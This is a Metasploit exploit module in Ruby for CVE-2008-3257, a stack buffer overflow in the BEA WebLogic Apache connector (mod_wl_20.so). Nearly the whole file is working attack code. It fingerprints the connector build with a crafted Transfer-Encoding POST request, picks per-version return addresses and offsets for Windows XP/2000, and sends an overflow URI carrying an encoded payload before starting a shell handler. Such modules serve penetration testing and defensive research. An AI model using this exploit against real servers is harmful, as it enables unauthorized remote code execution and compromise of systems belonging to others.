##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
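class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Apache/ ] }

  include Msf::Exploit::Remote::HttpClient

  # Known mod_wl_20.so builds as [version label, build date/time, change number].
  # Both the build date/time and the change number must appear in the bridge
  # message for a build to be reported; order here mirrors the order of the
  # non-automatic entries in 'Targets'.
  KNOWN_BUILDS = [
    ['BEA WebLogic 8.1 SP6 - mod_wl_20.so', 'Jun 16 2006 15:14:11', '779586'],
    ['BEA WebLogic 8.1 SP5 - mod_wl_20.so', 'Aug 5 2005 11:19:57', '616810'],
    ['BEA WebLogic 8.1 SP4 - mod_wl_20.so', 'Oct 25 2004 09:25:23', '452998']
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in the BEA
          Weblogic Apache plugin.

          The connector fails to properly handle specially crafted HTTP POST
          requests, resulting a buffer overflow due to the insecure usage
          of sprintf. Currently, this module works over Windows systems without DEP,
          and has been tested with Windows 2000 / XP.

          In addition, the Weblogic Apache plugin version is fingerprinted with a POST
          request containing a specially crafted Transfer-Encoding header.
        },
        'Author' => [
          'KingCope', # Vulnerability Discovery and PoC
          'juan vazquez', # Metasploit Module
        ],
        'References' => [
          [ 'CVE', '2008-3257' ],
          [ 'OSVDB', '47096' ],
          [ 'BID', '30273' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Privileged' => true,
        'Platform' => 'win',
        'Payload' => {
          'Space' => 4000,
          'BadChars' => "\x00\x0d\x0a\x3f"
        },
        'Targets' => [
          [ 'Automatic', {} ],
          [
            'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ],
          [
            'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ],
          [
            'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ]
        ],
        'DisclosureDate' => '2008-07-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
      ]
    )
  end

  # Classifies the host from the fingerprint string returned by fingerprint_mod_wl.
  #
  # @return [Msf::Exploit::CheckCode] Appears for a known-vulnerable build or a
  #   build dated before the patch, Detected when the bridge page is present but
  #   could not be dated, Safe when the connector is absent or the build is dated
  #   after the patch, Unknown for any other fingerprint string.
  def check
    fingerprint = fingerprint_mod_wl
    print_status "#{rhost}:#{rport} - #{fingerprint}"

    case fingerprint
    when /Version found/, /BEA WebLogic connector vulnerable/
      Exploit::CheckCode::Appears
    when /BEA WebLogic connector undefined/
      Exploit::CheckCode::Detected
    # fingerprint_mod_wl reports "not vulnerable"; the earlier pattern
    # "no vulnerable" never matched it, so a patched host fell out of the
    # case with a nil check code instead of Safe.
    when /BEA WebLogic connector not vulnerable/, /BEA WebLogic connector not found/
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Unknown
    end
  end

  def exploit
    # Autodetect BEA mod_wl version
    my_target = get_target

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("BEA mod_weblogic not supported")
      return
    end

    uri = normalize_uri(target_uri.path)
    sploit = rand_text_alphanumeric(my_target['Offset'] - uri.length)
    sploit << [my_target.ret].pack("V")
    sploit << payload.encoded

    send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri} #{sploit}",
    })

    handler
  end

  # Resolves the target entry to use.
  #
  # @return [Msf::Module::Target, nil] the user-selected target, or the entry of
  #   'Targets' matching the fingerprinted build, or nil when the build is not
  #   one of the supported ones.
  def get_target
    return target if target.name != 'Automatic'

    fingerprint = fingerprint_mod_wl

    case fingerprint
    when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
      targets[1]
    when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
      targets[2]
    when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
      targets[3]
    else
      nil
    end
  end

  # Fingerprints the mod_wl connector from the "Weblogic Bridge Message" page.
  #
  # @return [String] one of: "Version found: <build label>" for a build listed in
  #   KNOWN_BUILDS, "BEA WebLogic connector vulnerable" / "not vulnerable" when
  #   only a build date could be read, "BEA WebLogic connector undefined" when the
  #   bridge page carries no usable date, or "BEA WebLogic connector not found".
  def fingerprint_mod_wl
    my_data = rand_text_alpha(rand(8..12))
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
        'headers' =>
        {
          'Transfer-Encoding' => my_data
        },
        'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
      }
    )

    body = res&.body.to_s
    return "BEA WebLogic connector not found" unless res && res.code == 200 && body.match?(/Weblogic Bridge Message/)

    # The earlier `when (/date/ and /change/)` form evaluated to the second regex
    # alone, so only the change number was ever compared; both are checked now.
    known = KNOWN_BUILDS.find do |_label, build_time, change_number|
      body.include?("Build date/time:</B> <I>#{build_time}") &&
        body.include?("Change Number:</B> <I>#{change_number}")
    end
    return "Version found: #{known.first}" if known

    # Check for dates prior to patch release
    date_match = body.match(/([A-Za-z]{3} [\s\d]{2} [\d]{4})/)
    return "BEA WebLogic connector undefined" unless date_match

    begin
      build_date = Date.parse(date_match[1])
    rescue ArgumentError
      # The loose pattern can match text that is not a calendar date.
      return "BEA WebLogic connector undefined"
    end

    if build_date <= Date.new(2008, 7, 28)
      "BEA WebLogic connector vulnerable"
    else
      "BEA WebLogic connector not vulnerable"
    end
  end
end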